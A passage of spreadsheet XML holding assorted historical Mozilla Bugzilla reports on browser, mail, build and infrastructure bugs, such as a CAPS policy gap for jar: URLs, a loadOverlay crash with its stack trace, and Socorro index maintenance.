Solution #2 would allow finer grained control on jars and would fix the file://
problem allowing matching of file:///home/john/myscripts/ URIs.
Reproducible: Always
Steps to Reproduce:
1. Go to http://software.informaction.com/test/capstest.html and follow
instructions to disable and reenable JavaScript
2. Go to jar:http://software.informaction.com/capstest.jar!/capstest.html and
follow instructions to disable and reenable JavaScript
Actual Results:  
I could successfully disable JavaScript on 
http://software.informaction.com/test/capstest.html
I could not disable JavaScript on
jar:http://software.informaction.com/capstest.jar!/capstest.html
Expected Results:  
CAPS should have allowed me to disable JavaScript on both URLs</t>
  </si>
  <si>
    <t>g.maone</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-483245</t>
  </si>
  <si>
    <t>drop bad indexes and create correct index in PROD Socorro DB</t>
  </si>
  <si>
    <t>Please run the following queries in production Socorro postgres db. If there is any output please paste in bug.
drop index topcrashurlfacts_day_key
drop index topcrashurlfacts_productdims_key
drop index topcrashurlfacts_signaturedims_key
drop index topcrashurlfacts_urldims_key
create index topcrashurlfacts_date_prod_url_sig on topcrashurlfacts (day productdims_id urldims_id signaturedims_id)</t>
  </si>
  <si>
    <t>CORE-55366</t>
  </si>
  <si>
    <t>Don't reveal UI language to site/page -- Change navigator.language to use Accept-Language instead of the UI language</t>
  </si>
  <si>
    <t>Reproduce:
1. Visit .
Actual result:
Your UI language and locale (e.g. en-US) is displayed.
Expected result:
Neither UI nor OS language or locale are revealed to page or site.
Additional Comments:
Compare HTTP 1.1. spec:
15.1.4 Privacy Issues Connected to Accept Headers
   Accept request-headers can reveal information about the user to all
   servers which are accessed. The Accept-Language header in particular
   can reveal information the user would consider to be of a private
   nature because the understanding of particular languages is often
   strongly correlated to the membership of a particular ethnic group.
   User agents which offer the option to configure the contents of an
   Accept-Language header to be sent in every request are strongly
   encouraged to let the configuration process include a message which
   makes the user aware of the loss of privacy involved.
   An approach that limits the loss of privacy would be for a user agent
   to omit the sending of Accept-Language headers by default and to ask
   the user whether or not to start sending Accept-Language headers to a
   server if it detects by looking for any Vary response-header fields
   generated by the server that such sending could improve the quality
   of service.
   Elaborate user-customized accept header fields sent in every request
   in particular if these include quality values can be used by servers
   as relatively reliable and long-lived user identifiers. Such user
   identifiers would allow content providers to do click-trail tracking
   and would allow collaborating content providers to match cross-server
   click-trails or form submissions of individual users. Note that for
   many users not behind a proxy the network address of the host
   running the user agent will also serve as a long-lived user
   identifier. In environments where proxies are used to enhance
   privacy user agents ought to be conservative in offering accept
   header configuration options to end users. As an extreme privacy
   measure proxies could filter the accept headers in relayed requests.
   General purpose user agents which provide a high degree of header
   configurability SHOULD warn users about the loss of privacy which can
   be involved.
While we don't send this info as HTTP header we offer it as JS property. See
the source of the testcase mentioned above for details.</t>
  </si>
  <si>
    <t>ben.bucksch</t>
  </si>
  <si>
    <t>CORE-931311</t>
  </si>
  <si>
    <t>Web Audio</t>
  </si>
  <si>
    <t>Intermittent TEST-UNEXPECTED-FAIL | /tests/content/media/webaudio/test/test_pannerNodeTail.html | Found 346 different samples maxDifference: 1.7296246886253357 first bad index: 2956 with source offset 0 and destination offset 0 - got 346 expected 0</t>
  </si>
  <si>
    <t>Ubuntu VM 12.04 x64 profiling opt test mochitest-1 on 2013-10-25 08:24:31 PDT for push 9e8729a42a06
slave: tst-linux64-ec2-041
https://tbpl.mozilla.org/php/getParsedLog.php?id=29665276&amp;tree=Profiling
159497 ERROR TEST-UNEXPECTED-FAIL | /tests/content/media/webaudio/test/test_pannerNodeTail.html | Found 346 different samples maxDifference: 1.7296246886253357 first bad index: 2956 with source offset 0 and destination offset 0 - got 346 expected 0
159499 ERROR TEST-UNEXPECTED-FAIL | /tests/content/media/webaudio/test/test_pannerNodeTail.html | Found 344 different samples maxDifference: 1.0674067586660385 first bad index: 2992 with source offset 0 and destination offset 0 - got 344 expected 0</t>
  </si>
  <si>
    <t>karlt</t>
  </si>
  <si>
    <t>cbook</t>
  </si>
  <si>
    <t>BUGZILLA-370739</t>
  </si>
  <si>
    <t>Bugzilla UI broken with Firefox 2.0.0.x</t>
  </si>
  <si>
    <t>Here is a typical screenshot of the UI I get with Fx 2.0.0.1:
http://landfill.bugzilla.org/qa30pg/attachment.cgi?id=379
This UI is the official one we are going to release in Bugzilla 3.0. mconnor told me yesterday this was probably due to a reflow bug (-&gt; CC'ing dbaron and roc) on the Mozilla 1.8 branch and that it was probably fixed on trunk. He also told me it was very unlikely to see it fixed on the 1.8 branch.
The problem is that Fx2 is the current stable browser not Fx3a2 and Bugzilla belongs to Mozilla and so releasing a product which doesn't display correctly with another Mozilla product looks really non-professional.
dbaron roc: do you know any workaround to fix the UI e.g. using CSS? Or is there a trivial fix for Fx2?
mkanat justdave myk: I don't think we can release Bugzilla 3.0 with such a bug unless you want to suggest Bugzilla users to move to IE...</t>
  </si>
  <si>
    <t>SEAMONKEY-265232</t>
  </si>
  <si>
    <t>MailNews: Account Configuration</t>
  </si>
  <si>
    <t>Make sure we respect locked prefs throughout Mailnews UI</t>
  </si>
  <si>
    <t>This is the mailnews part of bug 264675</t>
  </si>
  <si>
    <t>iann_bugzilla</t>
  </si>
  <si>
    <t>FIREFOX-256635</t>
  </si>
  <si>
    <t>Keyboard Navigation</t>
  </si>
  <si>
    <t>[Linux] N-th tab shortcuts should use Alt-1 to Alt-9 rather than Ctrl-1 to Ctrl-9</t>
  </si>
  <si>
    <t>The tab-switching keyboard shortcuts on Linux currently use Ctrl-1 (switch to
first tab) through Ctrl-9 (switch to 9th tab).  This is inconsistent with other
apps such as gnome-terminal and xchat which use Alt-1 through Alt-9 for this
same functionality.  We should switch to using Alt for these shortcuts on
GTK/GTK2 builds at least.
(Note that our Ctrl-PgUp and Ctrl-PgDn shortcuts for next/previous tab *are*
consistent with gnome-terminal and xchat so those should stay Ctrl.)</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-243605</t>
  </si>
  <si>
    <t>IMAP IDLE support causes hang and delete entire Mozilla Profile(s)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040421
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040421
Tonight I lost my entire Mozilla 1.7 RC1 profile in Windows XP and Mac OS X
10.3.3.  The symptom is where you exit Mozilla 1.7 RC1 and it hangs in memory
for a while.  This deleted the \Profile and onward path.
In Windows XP you have to open the Windows XP Task Manager click on Processes
highlight mozilla.exe and click End Process.
In Mac OS X 10.3.3 you right-click on the Mozilla icon on the Dock wait a few
seconds for the pop-up menu to display and click Forced Quit.
If Mozilla 1.7 RC1 continues to hang where it will not completely exit from
memory (or stop running) this completely deletes the Mozilla profile if more
than one profile it will remove all profiles.
I could not find any corrupted files that I checked the address book message
filters message files I deleted all *.msf files and built them back by
clicking on each mail folder etc.
I stumbled on this problem/bug recently but I thought I had done something
wrong or something was running on the system that caused it to occur.  Now I see
the symptom that makes an entire Mozilla profile to delete. 
Update....
In Mozilla 1.7 RC1 click Edit | Mail and Newsgroups Account Settings click on
Server Settings click Advanced in the IMAP tab unselect 'Use IDLE command if
the server supports it'.  Click OK and OK to return to Mozilla Mail.
Mozilla 1.7 RC1 Mail no longer hangs on exit where it deletes the Profile
directory so far.
Mozilla 1.7 RC1
Windows XP SP1a (all updates installed)
Mac OS X 10.3.3 (all updates installed)
E-mail account type: IMAP
E-mail server type: Linux IMAP4 
Reproducible: Sometimes
Steps to Reproduce:
1. Run Mozilla Mail using an IMAP account.
2. Make sure the IDLE support has been enabled the Advanced Account Settings window.
3. Quit Mozilla and when it hangs let it hang for a while and then when you run
Mozilla again the entire Mozilla profile has been deleted.
Actual Results:  
The Mozilla Profile(s) had been deleted.
Expected Results:  
Just in Mozilla 1.7 RC1 where IMAP IDLE support is a new feature.</t>
  </si>
  <si>
    <t>nipperspot</t>
  </si>
  <si>
    <t>DOCUMENTATION_GRAVEYARD-147782</t>
  </si>
  <si>
    <t>Help Viewer</t>
  </si>
  <si>
    <t>Plugin documentation for MacOS X</t>
  </si>
  <si>
    <t>We accept patches.
Anything to add can be sent to nobandwidth@bigpond.com or added to this bug. I'm
just adding it to plugindoc.mozdev.org...</t>
  </si>
  <si>
    <t>hendikins</t>
  </si>
  <si>
    <t>CORE-341300</t>
  </si>
  <si>
    <t>Generator-iterator tests for JS1.7</t>
  </si>
  <si>
    <t>I have some tests written that exercise iterators generators |Iterator| and |__iterator__|.  Uploading in a sec...</t>
  </si>
  <si>
    <t>SEAMONKEY-202465</t>
  </si>
  <si>
    <t>The page is not rendered correctly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030414
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030414
Look for the following line in the URL mentioned.
SELECT LEFT(LastName 3) AS FirstThreeLettersOfLastName FROM Employees
The line goes into the right side brown area. Opera and IE render this correctly.
Attaching the screen shot.
Reproducible: Always
Steps to Reproduce:
1. Open the url in Mozilla - see the line mentioned going outside its
frame/table/ area.
2.
3.
Expected Results:  
Render the frame/table correctly</t>
  </si>
  <si>
    <t>nagu.parasu</t>
  </si>
  <si>
    <t>TOOLKIT-305067</t>
  </si>
  <si>
    <t>When the extension datasource has incorrect app disabled data it should be possible to enable a compatible extension that has been app disabled.</t>
  </si>
  <si>
    <t>A couple of recent regressions has app disabled extensions and not app enabled
them when they are made compatible. Since they are compatible the ui presents
the option to enable but it does nothing. Patch coming up.</t>
  </si>
  <si>
    <t>THUNDERBIRD-252247</t>
  </si>
  <si>
    <t>Persistent JavaScript Error: GetThreadTree is not defined</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040616
Build Identifier: Thunderbird 0.7.1 (20040626) Branch 0.7+ (20040719) Trunk 0.6+ (20040720) Mac OS 10.2.8 and 10.3.4
 Whenever I start Thunderbird I usually can find the following error in the
JavaScript console:
   Error: GetThreadTree is not defined
   Source File: chrome://messenger/content/mail3PaneWindowCommands.js Line: 713
If more than one account is registered then multiple occurrences of this error
are present in the JavaScript console (note that I typically use IMAP accounts).
This happens even with a clean install of Thunderbird checking an IMAP account.
 If these errors are not produced on the first attempt I can usually find them
after restarting Thunderbird. I've reproduced this bug on four Macs under both
Mac OS 10.2.8 and 10.3.4.
 I haven't been able to work out whether the errors represent a loss of
function: severity -&gt; minor.
Reproducible: Sometimes
Steps to Reproduce:
Launch Thunderbird and open the Javascript Console from the Tools menu.
Actual Results:  
Observe at least one instance of the error described above.
Expected Results:  
JavaScript Console should report no errors.</t>
  </si>
  <si>
    <t>CORE-337733</t>
  </si>
  <si>
    <t>Security: PSM</t>
  </si>
  <si>
    <t>implement an rc4 xpcom interface</t>
  </si>
  <si>
    <t>It would be nice to have an xpcom interface to the rc4 implementation in freebl.
Specifically safe browsing would like to use it to encrypt urls on the client side.  We're currently using a javascript implementation (in /toolkit/components/url-classifier/content/js/arc4.js) but it's pretty slow.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-318880</t>
  </si>
  <si>
    <t>Despot</t>
  </si>
  <si>
    <t>Despot should log authentication results</t>
  </si>
  <si>
    <t>Despot controls a fairly critical piece of CVS infrastructure and thus should log authentication results (success or failure) just like the linux login shells do so we can tell when people log in or when someone is attempting to brute-force someone's password.
Using a perl warn() statement so it shows up in Apache's error log would probably be sufficient for now but long-term it would be nice to feed it to syslog's auth.* channel.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-99322</t>
  </si>
  <si>
    <t>would like write access (Ulrich Drepper)</t>
  </si>
  <si>
    <t>As a sporadic contributor I certainly need a super-reviewer.
Chris Blizzard  volunteered to be my voucher.</t>
  </si>
  <si>
    <t>drepper</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-365745</t>
  </si>
  <si>
    <t>fast-update should query bonsai for multiple directories at once</t>
  </si>
  <si>
    <t>fast-update currently queries bonsai for updates to each directory in the tree one-by-one.  This is very time consuming especially when no checkins have occurred (the exact situation where fast-update should be most useful).  It should query all the directories at once.  This speeds up a fast-update pull when no changes have occurred by ~5x.</t>
  </si>
  <si>
    <t>CORE-374021</t>
  </si>
  <si>
    <t>crash [@ IsChromeURI] Loading an overlay using loadOverlay into an uninitialized XULDocument</t>
  </si>
  <si>
    <t>Loading an overlay using loadOverlay into an uninitialized XULDocument crashes:
var xulDoc = Components.classes[@mozilla.org/xul/xul-document1].createInstance(Components.interfaces.nsIDOMXULDocument) xulDoc.loadOverlay(chrome://browser/content/null)
Discovered by dkirsch on irc.
IsChromeURI(aURI=0x00000000)  Line 146	C++
nsXULDocument::LoadOverlayInternal(aURI=0x03f6d558 aIsDynamic=0x00000001 aShouldReturn=0x0012e794 aFailureFromContent=0x0012e78c)  Line 2694	C++
nsXULDocument::LoadOverlay(aURL={...} aObserver=0x00000000)  Line 2656	C++
NS_InvokeByIndex(that=0x00000011 methodIndex=0x00000002 paramCount=0x0012e904 params=0x00d01894)  Line 102	C++
XPCWrappedNative::CallMethod(ccx={...} mode=0x00000011)  Line 2247	C++
XPCWrappedNative::CallMethod(ccx={...} mode=CALL_METHOD)  Line 2247	C++
XPC_WN_CallMethod(cx=0x040cb0a8 obj=JSObject [... slots] argc=0x00000002 argv=0x04120610 vp=0x0012ebac)  Line 1464	C++
js_Invoke(cx=0x040cb0a8 argc=0x00000002 flags=0x00000000)  Line 1353	C
js_Interpret(cx=0x040cb0a8 pc=0x00d40b1c result=0x0012f1ac)  Line 4042	C
js_Execute(cx=0x040cb0a8 chain=JSObject [... slots] script=JSScript javascript: var%20xulDoc%20%3D%20Components.classes%5B%22%40mozilla.org%2Fxul%2Fxul-document%3B1%22%5D.createInstance(Components.interfaces.nsIDOMXULDocument)%3BxulDoc.loadOverlay(%22chrome%3A%2F%2Fbrowser%2Fcontent%2F%22%2Cnull)%3B%20 down=0x00000000 flags=0x00000000 result=0x0012f2d8)  Line 1612	C</t>
  </si>
  <si>
    <t>jeanluc.bonnafoux</t>
  </si>
  <si>
    <t>asqueella</t>
  </si>
  <si>
    <t>CORE-373640</t>
  </si>
  <si>
    <t>nsIFile.parent throws an exception on reaching top of file system -- should return null</t>
  </si>
  <si>
    <t>http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/xpcom/io/nsIFile.idl&amp;rev=1.63&amp;mark=324-327#320
The specification of nsIFile.parent in IDL makes no mention whatsoever of it possibly throwing exceptions.  Therefore except in very anomalous circumstances such as OOM using it should never throw an exception.  Currently it seems that on Windows using .parent can result in an unrecognized-path exception which is plain wrong given the (minimal) specification given in IDL comments.
This was discovered when an automated test for bug 332389 broke the Windows testing tinderbox on the assumption that the Windows .parent implementation matched the specification.  We absolutely *should not* be having problems conforming to the basic functionality in the nsI(Local)?File specification on any of the major platforms.</t>
  </si>
  <si>
    <t>TOOLKIT-995489</t>
  </si>
  <si>
    <t>Autocomplete</t>
  </si>
  <si>
    <t>Generalize the AutoCompleteE10S.jsm a little bit</t>
  </si>
  <si>
    <t>For bug 949617 I need to show an autocomplete popup with login manager entries. I was able to use the existing code with a few modifications.</t>
  </si>
  <si>
    <t>CORE-983486</t>
  </si>
  <si>
    <t>Collect parallel arenas between iterations if data cannot escape</t>
  </si>
  <si>
    <t>During parallel execution the only way that objects can escape a parallel callback is through the return value. Therefore if the return value is known to have scalar type no objects can escape and hence it is reasonable to just completely free all objects in the parallel arenas in between iterations.
Given that requesting a GC causes bailouts *and* our allocation routines are not especially parallelized this turns out to be crucial for performance for applications where the parallel kernel does a lot of allocation.
An example is the test case in bug 977567.</t>
  </si>
  <si>
    <t>nmatsakis</t>
  </si>
  <si>
    <t>CORE-268535</t>
  </si>
  <si>
    <t>crashes where rt-&gt;gcFreeList turns into a small int after last-ditch GCs</t>
  </si>
  <si>
    <t>I created a multithreaded test app in an attempt reproduce atom related crashes
we've been seeing. It didn't expose crashes with the exact same stacks. But it
does show some interesting problems.
I'll attach the source. I don't have a generic Makefile for it. But it is only
one .c file that builds as a standalone executable that uses only spidermonkey
and nspr. It creates one JSRuntime and a bunch of threads that each create a
JSContext and loop through the evaluation of scripts each containing a bunch of
randomly generated identifiers (all within JS requests).
The scripts currently look like...
function FOO {var FOO_1 var FOO_2}
function BAR {var BAR_1 var BAR_2}
FOO()
BAR()
Of course it creates a ton of those lines. And the identifier lengths are also
randomized.
I believe that my test code represents a valid use of the api and that all
scripts are themselves valid.
I've seen this test fail in a few ways:
1) Crash in js_AllocGCThing (jsgc.c:479) where rt-&gt;gcFreeList is equal to 1 (but
should be a valid pointer or NULL). This *seems* to happen when one or more
other threads are doing last ditch GCs. I've seen this a number of times.
2) A ReferenceError reported by the error reporter (e.g. ReferenceError: FOO
is not defined). The identifier in question in these cases in shown as text by
the error reporter. It is always actually a valid identifier that is in the
script (the test code guarantees that - and I've  validated the script contents
in some of these cases to be sure). This error indicates that the interpreter
failed to find an atom at runtime that it absolutely should have found. I've
seen this a bunch of times. This *might* indicate a corrupted atom.
3) A crash in QuoteString (jsopcode.c:402) called by
js_AtomToPrintableString in the case where the interpreter is trying to build
the string to report a ReferenceError (as above). This looks like a case where
the atom that the interpreter is trying to lookup is not only not found as a
property but that the atom used for the search actually represents a bogus
JSString while the interpreter is still trying to use it. I've seen this once so
far.
There are a bunch of #defines at the top for thread counts GC frequency
identifier length etc. I've been twiddling this stuff a lot and seeing
different effects. This test is just a quick hack at this point.
I'm hopeful that this will help in figuring out problems we've been seeing. And
that this might be a starting point for a multithreaded smoketest (at least).</t>
  </si>
  <si>
    <t>jband_mozilla</t>
  </si>
  <si>
    <t>CORE-334518</t>
  </si>
  <si>
    <t>[FIX]Exit reflow phase before processing reflow callbacks</t>
  </si>
  <si>
    <t>I get the following stack:
#1  0xb7e4ba7e in NS_DebugBreak_P (aSeverity=1 aStr=0xb649c8cf recurring into reflow 
    aExpr=0xb649c7e0 mPresContext-&gt;mLayoutPhaseCount[eLayoutPhase_Reflow] == 0 
    aFile=0xb649c74c ../../dist/include/layout/nsPresContext.h aLine=823)
    at ../../../mozilla/xpcom/base/nsDebugImpl.cpp:354
#2  0xb5d8825f in nsAutoLayoutPhase::Enter (this=0xbfffd970)
    at ../../../mozilla/layout/base/nsPresContext.h:822
#3  0xb5d88395 in nsAutoLayoutPhase (this=0xbfffd970 aPresContext=0x82ce030 
    aPhase=eLayoutPhase_Reflow) at ../../../mozilla/layout/base/nsPresContext.h:799
#4  0xb5de2a04 in PresShell::ProcessReflowCommands (this=0x82cecd0 aInterruptible=0)
    at ../../../mozilla/layout/base/nsPresShell.cpp:6526
#5  0xb5dde7a6 in PresShell::FlushPendingNotifications (this=0x82cecd0 
    aType=Flush_Layout) at ../../../mozilla/layout/base/nsPresShell.cpp:5093
#6  0xb5dde403 in PresShell::HandlePostedReflowCallbacks (this=0x82cecd0)
    at ../../../mozilla/layout/base/nsPresShell.cpp:4996
#7  0xb5de27aa in PresShell::DidDoReflow (this=0x82cecd0)
    at ../../../mozilla/layout/base/nsPresShell.cpp:6478
#8  0xb5de2d92 in PresShell::ProcessReflowCommands (this=0x82cecd0 aInterruptible=0)
    at ../../../mozilla/layout/base/nsPresShell.cpp:6620</t>
  </si>
  <si>
    <t>CORE-366870</t>
  </si>
  <si>
    <t>font/glyph selection test</t>
  </si>
  <si>
    <t>Created attachment 251326
font/glyph selection test
Here's my take on adding a test for font/glyph selection so that we can create a comprehensive test suite for this stuff.  See the docs in gfxFontSelectionTests.h on information on how to add tests.</t>
  </si>
  <si>
    <t>CORE-328897</t>
  </si>
  <si>
    <t>JS_ReportPendingException doesn't</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE:
1)  Add a JS_ReportPendingException call to nsJSThunk::EvaluateScript after the
    call to EvaluateString().
2)  Load the URI in the URL field.
ACTUAL RESULTS:  No error reported
EXPECTED RESULTS: Error reported.
We end up getting into js_ReportUncaughtException not having a reportp which makes us call JS_ReportErrorNumber.  Then we get into ReportError js_ErrorToException succeeds we notify our debug hook... and nothing.  We never call into cx-&gt;errorReporter.
Brendan suggested a hack that makes this work locally but I'm not at all sure it's correct.  I'll attach it in a sec.</t>
  </si>
  <si>
    <t>FIREFOX-414627</t>
  </si>
  <si>
    <t>Decide default amount of site-button text for DV-SSL</t>
  </si>
  <si>
    <t>What should the default setting for the browser.identity.ssl_domain_display pref be for the presentation of domain info in SSL?  
Bug 406612 introduces the pref but keeps the presentation as-is with the pref at 0 but setting it to 1 would certainly add discoverability and feedback and still constrain us from the total duplication of the url bar contents.  I think this is my preference but it does mean that the site button ends up more intrusive in those cases.
The patch is extremely low risk we just need to decide which state we want as default.
I propose changing the default to 1 for the sake of spawning discussion.  I've copied people I could remember who had expressed an opinion on the subject.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-198966</t>
  </si>
  <si>
    <t>Creating a folder ~MyFolder~ is bad (Folder disappears after restart when folder name ends with ~)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0.1) Gecko/20021003
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0.1) Gecko/20021003
I created a folder named ~FromHome~.  It worked fine. I created a filter and it
moved a bunch of email into the new folder. 
When I restarted Mozilla the folder did not appear. The files are in my home
dir.  The filter complained that the folder did not exist anymore.  
May be recoverable by renaming the email files....I will try it.
Reproducible: Always
Steps to Reproduce:
1. Create ~folderName~
2. Put some mail in it.
3. Restart Mozilla
Actual Results:  
The folder and mail are gone.  
Expected Results:  
Disallow creating a folder with tildas in  the name.
I lost data...emails.</t>
  </si>
  <si>
    <t>ohlemacher</t>
  </si>
  <si>
    <t>CORE-526633</t>
  </si>
  <si>
    <t>unnecessary code for NS_ACTIVATE/NS_DEACTIVATE in nsObjectFrame::HandleEvent()</t>
  </si>
  <si>
    <t>nsObjectFrame::HandleEvent() has code (for non XP_WIN platforms) to handle
NS_ACTIVATE/NS_DEACTIVATE.
http://hg.mozilla.org/mozilla-central/annotate/3d5cde53f929/layout/generic/nsObjectFrame.cpp#l1849
which is used (only for Mac) in ProcessEvent() when the event has a .nativeMsg:
http://hg.mozilla.org/mozilla-central/annotate/3d5cde53f929/layout/generic/nsObjectFrame.cpp#l4224
However these events do not have a .nativeMsg with Cocoa (or GTK).
http://hg.mozilla.org/mozilla-central/annotate/3d5cde53f929/widget/src/cocoa/nsChildView.mm#l2414
I assume the code on nsObjectFrame::HandleEvent() is unnecessary (if it ever
did anything) because NS_FOCUS_CONTENT and NS_BLUR_CONTENT notify the plugin
of focus changes:
http://hg.mozilla.org/mozilla-central/annotate/3d5cde53f929/layout/generic/nsObjectFrame.cpp#l4160</t>
  </si>
  <si>
    <t>TOOLKIT-476299</t>
  </si>
  <si>
    <t>Decay frecency values to estimate recalculating frecencies</t>
  </si>
  <si>
    <t>This is part 3 of 3 to address bug 458801.
Instead of recalculating old frecencies we can just multiply them by a scaling factor similar to what we do for adaptive results. If the page does get visited it'll go through the full frececency recalculation anyway.</t>
  </si>
  <si>
    <t>edilee</t>
  </si>
  <si>
    <t>FIREFOX-351133</t>
  </si>
  <si>
    <t>Options&gt;Feeds Choose Application... button is cut off and scroll-bar appears.</t>
  </si>
  <si>
    <t>with win XP default Theme standard font size Japanese language.
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1b2) Gecko/20060901 BonEcho/2.0b2 ID:2006090103
http://img134.imageshack.us/img134/3136/feedprefxo7.jpg
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1b2) Gecko/20060901
BonEcho/2.0b2 ID:2006090116
http://img176.imageshack.us/img176/8335/preffi3.jpg</t>
  </si>
  <si>
    <t>bugmozz</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-415614</t>
  </si>
  <si>
    <t>ko / Korean</t>
  </si>
  <si>
    <t>Firefox 3 ko release tracker</t>
  </si>
  <si>
    <t>This is a tracker bug for releasing Firefox 3 ko.
This bug is not that detailed but as we get particular work items they should block this bug for tracking and better discoverability.</t>
  </si>
  <si>
    <t>channy</t>
  </si>
  <si>
    <t>CORE-410881</t>
  </si>
  <si>
    <t>Broken menus in trunk Linux builds</t>
  </si>
  <si>
    <t>BUILD: Seamonkey or Firefox build from 2008-01-03-02 or later
STEPS TO REPRODUCE:
1) Start the browser
2) Open a menu
ACTUAL RESULTS:  Depending on the menu either opens at 0x0 size or opens at the height of the screen.  In the latter case either none of the menuitems paint or the ones before the first separator paint and nothing after that.
EXPECTED RESULTS: Menus work
REGRESSION RANGE:  2008-01-02-02 to 2008-01-03-02 with Seamonkey builds.  Bonsai URL with 2 hours padding:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=MozillaTinderboxAll&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2008-01-02+00&amp;maxdate=2008-01-03+04&amp;cvsroot=%2Fcvsroot
ADDITIONAL NOTES:  Switching to the Modern theme fixes the bug so I'm guessing this is a regression from one of the GTK native theming fixes.  I can only reproduce this with mozilla.org builds.  My own builds don't show the problem.  I'm using GTK2 2.6.10 in case that matters.  Another box using GTK2 2.8.20 doesn't show the problem but there are various other library and package differences there too (e.g. no gnome themes on that machine).
If the issue is in fact that we don't support gtk2 2.6 at runtime if compiled against some other gtk version we should fail to start instead of starting all broken...</t>
  </si>
  <si>
    <t>WEBTOOLS-526466</t>
  </si>
  <si>
    <t>ISPDB Server</t>
  </si>
  <si>
    <t>WEBTOOLS</t>
  </si>
  <si>
    <t>&amp; in ISP name generates invalid XML</t>
  </si>
  <si>
    <t>Reproduction:
Enter AT&amp;T as ISP name
Actual result:
See http://ispdb.mozillamessaging.com/export_xml/35
Expected result:
Escape strings!</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-112118</t>
  </si>
  <si>
    <t>sonicblue.com - preorder page gives SSL error in Moz</t>
  </si>
  <si>
    <t>Platform: PowerBook G3/300/192Mb/48Gb MacOS X 10.1.1
Fizzilla Build ID: 2001112005
Try the following.
1) Go to the ReplayTV website.
http://www.replaytv.com/
2) Click Order Now towards the bottom of the page or simply go to the
following URL
http://www.sonicblue.com/preorder
What happens: An error message displays:
You cannot connect to outlook.replaytv.com because of an unknown SSL error (-8073)
What should happen: I should be able to connect to the purchase website.
- Adam</t>
  </si>
  <si>
    <t>masri</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-484982</t>
  </si>
  <si>
    <t>CLOUD_SERVICES</t>
  </si>
  <si>
    <t>Weave should support SeaMonkey</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.9.1b4pre) Gecko/20090323 SeaMonkey/2.0b1pre
Build Identifier: 
Will be good if weave can work on seamonkey.
At least History passwords tabs can work like on firefox now.
Reproducible: Always</t>
  </si>
  <si>
    <t>mozdiav</t>
  </si>
  <si>
    <t>CALENDAR-133263</t>
  </si>
  <si>
    <t>Sunbird Only</t>
  </si>
  <si>
    <t>RFE: context menu should show useful options</t>
  </si>
  <si>
    <t>I'm using Mozilla 0.9.9 with the XPI of March 21.
Right now right-clicking on an event or on a date shows the 'reload' option.
It would be very nice if a right click showed the options to create a new event
and to edit an event if one is selected.</t>
  </si>
  <si>
    <t>mikeypotter</t>
  </si>
  <si>
    <t>gullc</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-32216</t>
  </si>
  <si>
    <t>MIME</t>
  </si>
  <si>
    <t>Mail date 1.1.1970(or 12.31.1969) when Date: header is localized or malformed</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows N NT4.0 en-US) Mozilla/M14 de-AT
BuildID:    2000022820
Mails with localized e.g. German Date: tag in the header appear with date
1.1.1970. Only english date/time abbreviations are properly recognized.
Reproducible: Always
Steps to Reproduce:
1.create mail with non-english date: tag in header	
2.send and receive mail
3.
sort mails by date
Actual Results:  mail programs states that mail was sent 1.1.1970
Expected Results:  mail date should be e.g. 03-17-2000.
english date tag in header:
Date: Fri 17 Mar 2000 12:29:40 +0100
german date tag in header:
Date: Di 14 Mrz 2000 16:56:44 +0100
Perhaps it's safer to sort by the time stamp of the smtp server.</t>
  </si>
  <si>
    <t>jorgk</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-483434</t>
  </si>
  <si>
    <t>add support for js narcissus</t>
  </si>
  <si>
    <t>CORE-23348</t>
  </si>
  <si>
    <t>NS_IMPL_MODULE() system needs registration hook</t>
  </si>
  <si>
    <t>NS_IMPL_MODULE needs a registration hook. I am hoping to implementing support
for a per component register and unregister proc in the componentinfo
structure.</t>
  </si>
  <si>
    <t>CORE-728924</t>
  </si>
  <si>
    <t>Fix MOZ_JAVA_COMPOSITOR definition</t>
  </si>
  <si>
    <t>Created attachment 598921
patch
We should define this everywhere we were using it in layout with it being defined there.</t>
  </si>
  <si>
    <t>b56girard</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-490578</t>
  </si>
  <si>
    <t>[tracking] Move hardware to the new MPT rack</t>
  </si>
  <si>
    <t>This is to track the upcoming move to our new rack at the MPT colo.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-301158</t>
  </si>
  <si>
    <t>cannot make xpinstall/packager when building deerpark --with-system-nspr</t>
  </si>
  <si>
    <t>In the makeinstall phase of my RPM I traditionally perform the following:
cd xpinstall/packager/
make MOZILLA_BIN=\$(DIST)/bin/firefox-bin STRIP=/bin/true
cd -
Using deerpark alpha2 source I get a bunch of 'cannot stat: no such file'
errors posted on screen.
